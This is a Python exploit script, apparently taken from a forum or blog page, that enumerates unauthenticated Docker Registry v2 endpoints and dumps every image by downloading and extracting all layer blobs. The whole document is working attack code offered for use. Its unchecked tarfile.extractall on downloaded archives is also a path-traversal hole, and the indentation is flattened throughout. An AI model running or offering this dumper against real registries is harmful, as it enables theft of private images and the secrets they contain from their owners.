# -*- coding:utf-8 -*-
import os
import tarfile
import argparse
import requests
requests.packages.urllib3.disable_warnings()
CACHE_PATH = "./caches/"
TIMEOUT = 5
def manageArgs():
parser = argparse.ArgumentParser()
parser.add_argument("url", help="URL")
action = parser.add_mutually_exclusive_group()
action.add_argument("--dump", metavar="IMAGENAME", dest='dump', type=str, help="ImageName")
action.add_argument("--tags", dest='tags', default=False, help="list tags", action="store_true")
action.add_argument("--dump_all", dest='dump_all', help="dump all", action="store_true")
args = parser.parse_args()
return args
def createDir(directoryName):
if "../" in directoryName:
print("[-] Hacker!")
return
if not os.path.exists(f"{CACHE_PATH}{directoryName}"):
os.makedirs(f"{CACHE_PATH}{directoryName}")
class RegistryUnauth():
def getImages(self):
url = "%s/v2/_catalog" % self.target
try:
req=requests.get(url,timeout=TIMEOUT,verify=False)
repos = req.json()["repositories"]
images = []
for repo in repos:
print("[+]",repo)
if self.list_tags:
self.getTags(repo)
images.append(repo)
return images
except Exception as e:
print("[-] Not vulnerability.")
return None
def getTags(self,image_name):
results = []
url = "%s/v2/%s/tags/list"%(self.target,image_name)
try:
req = requests.get(url,timeout=TIMEOUT,verify=False)
tags = req.json()["tags"]
for tag in tags:
if self.list_tags:
print(f" [*] {image_name}:{tag}")
results.append({"image":image_name,"tag":tag})
if self.list_tags:
print()
except Exception as e:
print("[-] Get tags failed,", str(e))
return results
def getBlob(self,image_name,tag):
url = "%s/v2/%s/manifests/%s" % (self.target,image_name,tag)
try:
req=requests.get(url,timeout=TIMEOUT,verify=False)
layers = req.json()["fsLayers"]
createDir(image_name.replace("/","_")+"/"+tag.replace(".","_"))
for l in layers:
self.downloadSha(image_name,tag,l["blobSum"])
except Exception as e:
print("[-]",str(e))
def downloadSha(self,image_name,version,sha256):
dir = image_name.replace("/","_")+"/"+version.replace(".","_")
name = sha256.split(":")[1]
filenamesha = f"{CACHE_PATH}{dir}/{name}.tar.gz"
url = f"{self.target}/v2/{image_name}/blobs/{sha256}"
try:
req=requests.get(url,timeout=TIMEOUT,verify=False)
if req.status_code == 200:
print(f" [+] Downloading : {name}")
with open(filenamesha, 'wb') as out:
for bits in req.iter_content():
out.write(bits)
tf = tarfile.open(filenamesha)
tf.extractall(f"{CACHE_PATH}{dir}/{name}")
os.remove(filenamesha)
else:
print(" [-] Download fail:",req.status_code)
except Exception as e:
print(e)
def check(self,args):
self.target = args.url.strip().strip("/")
self.list_tags = args.tags
images = []
if args.dump:
images.append(args.dump)
else:
images = self.getImages()
if images != None and len(images)==0:
print("[-] 0 public images found.")
return
if not args.dump_all:
return
for image in images:
tags = self.getTags(image)
for tag in tags:
print("[+] Dumping : %s:%s"%(tag["image"],tag["tag"]))
self.getBlob(tag["image"],tag["tag"])
if __name__ == "__main__":
args = manageArgs()
m = RegistryUnauth()
m.check(args)
全部评论 (2)